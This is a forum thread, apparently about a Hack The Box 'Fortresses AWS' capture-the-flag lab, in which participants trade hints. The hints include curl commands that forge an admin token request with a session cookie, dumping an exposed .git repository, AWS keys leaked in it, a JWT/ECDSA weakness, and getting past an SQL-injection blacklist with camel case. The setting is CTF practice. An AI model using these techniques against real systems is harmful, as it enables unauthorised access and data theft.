Fortresses_AWS
(July 17, 2022, 10:03 AM)just4htb1337 Wrote: Any chance someone could help with how to extract the base64.c00.xyz in "logs.amzcorp.local"? Tried different kind of grep, jq, even notepad++



nvm ... managed to extract them using transpose paste in excel :)

But couldn't find any flag, just the parts of passwd file and cron...


nvm ... got the flag...


Learn python, man...
Reply
Got some trouble running the code on page 1... my output:
Perhaps it's patched or I am doing something wrong... any nudge?
└─# echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzBlOTJkMjE5YzJhZDczNmIwYzcyOTM5MDliYjA1MGRkOGQ3MzM4YyJ9.YtRbaQ.HciZXzFO_PNnBvYtPW2TPbtEdm4" -d '{"data":"{}"}' --header "Content-Type: application/json"
AWS Console Dashboard - Error 403
404 not found

Access denied

Please contact support or authenticate

CLICK TO RETURN HOME
Reply
[quote="h4ckth3b0x" pid="156333" dateline="1658084047"]
Got some trouble running the code on page 1... my output:
Perhaps it's patched or I am doing something wrong... any nudge?
└─# echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzBlOTJkMjE5YzJhZDczNmIwYzcyOTM5MDliYjA1MGRkOGQ3MzM4YyJ9.YtRbaQ.HciZXzFO_PNnBvYtPW2TPbtEdm4" -d '{"data":"{}"}' --header "Content-Type: application/json"
AWS Console Dashboard - Error 403
404 not found

Access denied

Please contact support or authenticate

CLICK TO RETURN HOME
[/quote]
Still works.
Create an account first then use your cookie...
[hr]
[quote="teksius" pid="155917" dateline="1658067265"]
[quote="just4htb1337" pid="155591" dateline="1658052220"]
[s]Any chance someone could help with how to extract the base64.c00.xyz in "logs.amzcorp.local"? Tried different kind of grep, jq, even notepad++[/s]
nvm ... managed to extract them using transpose paste in excel :)
[s]But couldn't find any flag, just the parts of passwd file and cron...[/s]
nvm ... got the flag...
[/quote]
Learn python, man...
[/quote]
Yeah man ... still in the learning phase :)
Reply
(July 15, 2022, 12:19 PM)mceye Wrote: look logs for Tyler and urlencoded password. Also look for the /.git and dump it. Then see the commits and look for info and vulnerability.


Any help to locate git and dump, only see that:

"hostname": "jobs-development.amzcorp.local",
"ip_address": "172.21.10.11",
"method": "GET",
"requester_ip": "129.141.123.251",
"url": "/.git"
Reply
(July 15, 2022, 04:10 PM)hacker1111 Wrote:
(July 15, 2022, 04:06 PM)fironeDerbert Wrote:
(July 15, 2022, 03:59 PM)hacker1111 Wrote:
(July 15, 2022, 03:46 PM)fironeDerbert Wrote: There are creds in the git:

ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')


You can use them like this:
apt-get install awscli


aws configure


enter the creds


aws --endpoint-url http://cloud.amzcorp.local ecs help


these creds are useless, focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit, i'm stuck here. if you are good in crypto then maybe you can find flag 4

and that jwt creating here http://company-support.amzcorp.local

The custom_jwt.py is to get the flag 4 or the flag 3 ?


flag 4

flag 3 is in sql db. dump keys_tbl table

[quote pid="152349" dateline="1657901437"]
Any help, with SQL injection, is it possible to use SQLMAP with some tamper, or do you play manually?
[/quote]
Reply
(July 19, 2022, 11:51 PM)Peter Wrote:
(July 15, 2022, 12:19 PM)mceye Wrote: look logs for Tyler and urlencoded password. Also look for the /.git and dump it. Then see the commits and look for info and vulnerability.


Any help to locate git and dump, only see that:

"hostname": "jobs-development.amzcorp.local",
"ip_address": "172.21.10.11",
"method": "GET",
"requester_ip": "129.141.123.251",
"url": "/.git"


Use git-dumper tool from github
Remember to add jobs-development.amzcorp.local to your /etc/hosts file


(July 20, 2022, 01:59 AM)htb_col Wrote:
(July 15, 2022, 04:10 PM)hacker1111 Wrote:
(July 15, 2022, 04:06 PM)fironeDerbert Wrote:
(July 15, 2022, 03:59 PM)hacker1111 Wrote:
(July 15, 2022, 03:46 PM)fironeDerbert Wrote: There are creds in the git:

ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')


You can use them like this:
apt-get install awscli


aws configure


enter the creds


aws --endpoint-url http://cloud.amzcorp.local ecs help


these creds are useless, focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit, i'm stuck here. if you are good in crypto then maybe you can find flag 4

and that jwt creating here http://company-support.amzcorp.local

The custom_jwt.py is to get the flag 4 or the flag 3 ?


flag 4

flag 3 is in sql db. dump keys_tbl table

[quote pid="152349" dateline="1657901437"]
Any help, with SQL injection, is it possible to use SQLMAP with some tamper, or do you play manually?


[/quote]
sqlmap doesn't work... manual injection is the path ... there is a blacklist filter... you can simply bypass it using camel case
Reply
(July 20, 2022, 05:41 AM)just4htb1337 Wrote:
(July 19, 2022, 11:51 PM)Peter Wrote:
(July 15, 2022, 12:19 PM)mceye Wrote: look logs for Tyler and urlencoded password. Also look for the /.git and dump it. Then see the commits and look for info and vulnerability.


Any help to locate git and dump, only see that:

"hostname": "jobs-development.amzcorp.local",
"ip_address": "172.21.10.11",
"method": "GET",
"requester_ip": "129.141.123.251",
"url": "/.git"


Use git-dumper tool from github
Remember to add jobs-development.amzcorp.local to your /etc/hosts file


/etc/hosts
I didn't even count on it, how many times do I get complicated without reviewing the basics.  Thanks!!!
Reply
anyone figure out how to exploit jwt for flag 4?
Reply
Anyone how sqldump
Reply
curl -s -X POST "http://jobs.amzcorp.local/api/v4/users/edit" --cookie "TYLER_SESSION_COOKIE" -d '{"update_user":"BASE64_MYUSER_JSON_PAYLOAD"}' --header "Content-Type: application/json" --cookie "api_token=API_TOKEN"
Internal Server Error

Internal Server Error

Also tried with an invalid user to get "Unable to find user" error but did not work.
--
curl -s -X POST "http://jobs.amzcorp.local/api/v4/users/edit" --cookie "" --cookie "api_token=API_TOKEN" --header "Content-Type: application/json" -d '{"update_user": ""}'
Even this is throwing an Internal Server Error.
Do you think something is broken?
Can somebody click on Reset?
----
UPDATE: No problem after reset.
Reply

